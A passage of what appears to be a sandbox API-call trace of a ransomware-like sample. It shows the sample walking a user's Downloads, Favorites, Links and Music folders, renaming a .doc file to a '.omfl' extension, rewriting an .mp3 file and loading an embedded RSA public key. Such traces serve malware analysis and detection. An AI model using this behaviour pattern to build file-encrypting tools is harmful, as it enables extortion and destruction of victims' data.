0xdcfa900 [0131.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f68 [0131.156] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xa201, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.156] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.157] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.157] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.157] CloseHandle (hObject=0x5c8) returned 1 [0131.159] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.159] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.159] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ysie.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ysie.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ysie.doc.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ysie.doc.omfl")) returned 1 [0131.161] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ec6620, ftCreationTime.dwHighDateTime=0x1d5e475, ftLastAccessTime.dwLowDateTime=0x34c9be0, ftLastAccessTime.dwHighDateTime=0x1d5db95, ftLastWriteTime.dwLowDateTime=0x34c9be0, ftLastWriteTime.dwHighDateTime=0x1d5db95, nFileSizeHigh=0x0, nFileSizeLow=0xa201, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ysie.doc", cAlternateFileName="")) returned 0 [0131.161] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0131.161] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.162] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.162] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.162] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.162] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0131.162] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.162] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34980 [0131.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.162] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750caf0 [0131.162] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.162] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.162] PathFindFileNameW (pszPath="") returned="" [0131.162] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0131.162] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.163] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.163] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.163] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0131.163] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0131.163] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0131.163] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0131.163] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.163] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.163] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.163] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.163] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0131.163] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.163] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34980 [0131.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.164] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750caf0 [0131.164] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.164] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.164] PathFindFileNameW (pszPath="") returned="" [0131.164] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.164] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0131.164] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.164] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.164] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0131.164] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0131.164] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0131.165] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0131.165] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0131.165] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0131.165] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0131.165] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.165] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.165] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0131.165] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.165] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.165] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.165] PathFindFileNameW (pszPath="") returned="" [0131.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0131.166] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.166] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.166] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0131.166] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0131.166] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0131.166] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0131.166] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0131.166] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0131.166] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0131.166] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0131.167] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0131.167] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.167] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0131.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.167] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.167] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.167] PathFindFileNameW (pszPath="") returned="" [0131.167] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0131.168] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.168] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0131.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.168] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.168] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.168] PathFindFileNameW (pszPath="") returned="" [0131.168] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda6abb60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda6abb60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0131.168] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda6abb60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda6abb60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.168] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.169] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0131.169] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x125bf050, ftCreationTime.dwHighDateTime=0x1d5e10c, ftLastAccessTime.dwLowDateTime=0x1726ca50, ftLastAccessTime.dwHighDateTime=0x1d5da73, ftLastWriteTime.dwLowDateTime=0x1726ca50, ftLastWriteTime.dwHighDateTime=0x1d5da73, nFileSizeHigh=0x0, nFileSizeLow=0xe084, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DjldUM9FLyiTpuN9GMU.mp3", cAlternateFileName="DJLDUM~1.MP3")) returned 1 [0131.169] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DjldUM9FLyiTpuN9GMU.mp3") returned=".mp3" [0131.169] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DjldUM9FLyiTpuN9GMU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\djldum9flyitpun9gmu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.169] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=57476) returned 1 [0131.169] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.172] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xe05e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.173] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.174] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xe084, lpOverlapped=0x0) returned 1 [0131.174] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.174] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.175] lstrlenA (lpString="-----BEGIN PUBLIC 